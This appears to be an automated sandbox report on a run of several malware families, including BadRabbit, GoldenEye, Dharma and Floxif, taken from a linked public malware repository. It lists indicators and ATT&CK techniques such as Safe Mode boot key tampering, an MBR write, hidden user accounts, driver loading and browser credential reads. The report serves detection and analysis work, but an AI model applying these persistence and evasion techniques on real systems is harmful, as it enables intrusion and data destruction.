badrabbit | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo/tree/master/Virus

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	Dharma.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	msedge.exe

Executes dropped EXE 46 IoCs

pid	Process
3404	SpySheriff.exe
2664	xpajB.exe
760	msedge.exe
3680	Mabezat.exe
2488	msedge.exe
444	msedge.exe
556	msedge.exe
4776	Gnil.exe
1364	spoclsv.exe
4820	Gnil.exe
4196	spoclsv.exe
632	Gnil.exe
1924	spoclsv.exe
1252	Gnil.exe
2852	spoclsv.exe
3144	msedge.exe
1316	msedge.exe
4056	msedge.exe
3820	Floxif.exe
1284	Floxif.exe
1244	msedge.exe
1640	msedge.exe
5012	msedge.exe
4392	msedge.exe
2440	msedge.exe
1892	Dharma.exe
3000	nc123.exe
3820	mssql.exe
3840	mssql2.exe
616	SearchHost.exe
3068	msedge.exe
4832	msedge.exe
2384	msedge.exe
4616	msedge.exe
1756	msedge.exe
1972	msedge.exe
4800	msedge.exe
5028	BadRabbit.exe
4708	D775.tmp
1740	msedge.exe
4828	msedge.exe
1964	msedge.exe
4084	msedge.exe
1712	msedge.exe
4436	GoldenEye.exe
2448	getmac.exe

Impair Defenses: Safe Mode Boot 1 TTPs 12 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\WOXNEVBKRZTMZPX.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\lbeohvvepbzkara.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\UKZPXXNDBSMHKCLL.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\qzmntytqospwhkgv.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\duurozgkfjafunoba.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\DUUROZGKFJAFUNOBA.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ofumftjlfifppe.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\LBEOHVVEPBZKARA.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ukzpxxndbsmhkcll.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\QZMNTYTQOSPWHKGV.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\OFUMFTJLFIFPPE.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\woxnevbkrztmzpx.sys	mssql.exe

Loads dropped DLL 52 IoCs

pid	Process
760	msedge.exe
2488	msedge.exe
2488	msedge.exe
444	msedge.exe
444	msedge.exe
556	msedge.exe
556	msedge.exe
3144	msedge.exe
3144	msedge.exe
1316	msedge.exe
1316	msedge.exe
4056	msedge.exe
4056	msedge.exe
3820	Floxif.exe
1284	Floxif.exe
1244	msedge.exe
1244	msedge.exe
1640	msedge.exe
1640	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
4392	msedge.exe
4392	msedge.exe
2440	msedge.exe
2440	msedge.exe
3068	msedge.exe
4832	msedge.exe
3068	msedge.exe
4832	msedge.exe
2384	msedge.exe
4616	msedge.exe
4616	msedge.exe
2384	msedge.exe
616	SearchHost.exe
1756	msedge.exe
1972	msedge.exe
1972	msedge.exe
1756	msedge.exe
4800	msedge.exe
4800	msedge.exe
2712	rundll32.exe
1740	msedge.exe
1740	msedge.exe
4828	msedge.exe
4828	msedge.exe
1964	msedge.exe
1964	msedge.exe
4084	msedge.exe
4084	msedge.exe
1712	msedge.exe
1712	msedge.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00090000000234d2-537.dat	upx
behavioral1/memory/3820-541-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/3820-544-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/1284-547-0x0000000010000000-0x0000000010030000-memory.dmp	upx
behavioral1/memory/1284-550-0x0000000010000000-0x0000000010030000-memory.dmp	upx

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\D:	SearchHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
50	raw.githubusercontent.com
51	raw.githubusercontent.com

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	getmac.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOADFPS.DLL	xpajB.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Xml.Linq.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.Effects.dll	xpajB.exe
File opened for modification	\??\c:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fr\UIAutomationClientsideProviders.resources.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe	xpajB.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\vfs\System\FM20.DLL	xpajB.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\it\Microsoft.Build.Utilities.v3.5.resources.dll	SearchHost.exe
File opened for modification	\??\c:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe	xpajB.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\ja\Microsoft.PackageManagement.resources.dll	xpajB.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\Microsoft.PackageManagement.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\Java\jre-1.8\bin\api-ms-win-core-string-l1-1-0.dll	xpajB.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jsound.dll	SearchHost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-environment-l1-1-0.dll	SearchHost.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.ComponentModel.TypeConverter.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\plugins\access\libdcp_plugin.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-datetime-l1-1-0.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Diagnostics.Tracing.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\System.ServiceModel.Resources.dll	xpajB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	xpajB.exe
File opened for modification	\??\c:\Program Files (x86)\Google\Update\1.3.36.371\goopdateres_fi.dll	xpajB.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_zh-TW.dll	xpajB.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	xpajB.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE	xpajB.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr\PresentationFramework.resources.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe	xpajB.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Diagnostics.StackTrace.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\plugins\demux\libmjpeg_plugin.dll	xpajB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ONWordAddin.dll	xpajB.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jfr.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Curve25519Wrap.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-runtime-l1-1-0.dll	xpajB.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Conversion.v3.5.resources.dll	xpajB.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ccme_base_non_fips.dll	xpajB.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\es\System.Data.Entity.Design.Resources.dll	SearchHost.exe
File opened for modification	\??\c:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Framework.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans\System.Windows.Forms.resources.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr\System.Windows.Controls.Ribbon.resources.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR\WindowsBase.resources.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans\PresentationFramework.resources.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-core-processthreads-l1-1-1.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\System.Runtime.InteropServices.RuntimeInformation.dll	xpajB.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_id.dll	xpajB.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe	xpajB.exe
File opened for modification	\??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\it\System.Web.Entity.Resources.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\api-ms-win-crt-filesystem-l1-1-0.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.Http.Json.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Security.Cryptography.X509Certificates.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\mso40uiimm.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\System.Windows.Input.Manipulations.resources.dll	xpajB.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Entity.dll	SearchHost.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\en\Microsoft.PackageManagement.MsuProvider.resources.dll	SearchHost.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEINTL.DLL	xpajB.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\msdaprst.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Net.WebSockets.Client.dll	xpajB.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fr\UIAutomationTypes.resources.dll	SearchHost.exe
File opened for modification	\??\c:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\ja\Microsoft.Build.Engine.resources.dll	xpajB.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jfr.dll	SearchHost.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Numerics.Vectors.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Web.HttpUtility.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ALRTINTL.DLL	xpajB.exe
File opened for modification	\??\c:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Utilities.v3.5.resources.dll	xpajB.exe
File opened for modification	\??\c:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\ChartIm.dll	xpajB.exe
File opened for modification	\??\c:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\fr\Microsoft.Build.Engine.resources.dll	xpajB.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\dispci.exe	rundll32.exe
File opened for modification	C:\Windows\D775.tmp	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\cscc.dat	rundll32.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1036	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Program crash 2 IoCs

pid	pid_target	Process	procid_target
784	3820	WerFault.exe	133
2712	1284	WerFault.exe	137

System Location Discovery: System Language Discovery 1 TTPs 49 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gnil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getmac.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dharma.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mssql2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BadRabbit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SearchHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpySheriff.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mabezat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoldenEye.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gnil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nc123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gnil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gnil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Floxif.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xpajB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Floxif.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	SearchHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	SearchHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	SearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	SearchHost.exe

NTFS ADS 11 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\{70bb6694-4a23-44ca-acb1-744821b43907}\getmac.exe\:SmartScreen:$DATA	GoldenEye.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 850233.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 814028.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 582731.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 719872.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 124000.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 360793.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 416713.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 861678.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 985449.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 752344.crdownload:SmartScreen	msedge.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
812	schtasks.exe
2348	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4808	msedge.exe
4808	msedge.exe
1216	msedge.exe
1216	msedge.exe
3652	identity_helper.exe
3652	identity_helper.exe
4712	msedge.exe
4712	msedge.exe
3388	msedge.exe
3388	msedge.exe
760	msedge.exe
760	msedge.exe
556	msedge.exe
556	msedge.exe
4776	Gnil.exe
4776	Gnil.exe
4776	Gnil.exe
4776	Gnil.exe
4776	Gnil.exe
4776	Gnil.exe
1364	spoclsv.exe
1364	spoclsv.exe
4820	Gnil.exe
4820	Gnil.exe
4820	Gnil.exe
4820	Gnil.exe
4820	Gnil.exe
4820	Gnil.exe
4196	spoclsv.exe
4196	spoclsv.exe
632	Gnil.exe
632	Gnil.exe
632	Gnil.exe
632	Gnil.exe
632	Gnil.exe
632	Gnil.exe
1924	spoclsv.exe
1924	spoclsv.exe
1252	Gnil.exe
1252	Gnil.exe
1252	Gnil.exe
1252	Gnil.exe
1252	Gnil.exe
1252	Gnil.exe
2852	spoclsv.exe
2852	spoclsv.exe
4056	msedge.exe
4056	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
2440	msedge.exe
2440	msedge.exe
4800	msedge.exe
4800	msedge.exe
2712	rundll32.exe
2712	rundll32.exe
2712	rundll32.exe
2712	rundll32.exe
4708	D775.tmp
4708	D775.tmp
4708	D775.tmp
4708	D775.tmp

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2664	xpajB.exe

Suspicious behavior: LoadsDriver 32 IoCs

pid	Process
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe
3820	mssql.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe
1216	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3820	Floxif.exe
Token: SeDebugPrivilege	1284	Floxif.exe
Token: SeDebugPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
Token: SeLoadDriverPrivilege	3820	mssql.exe
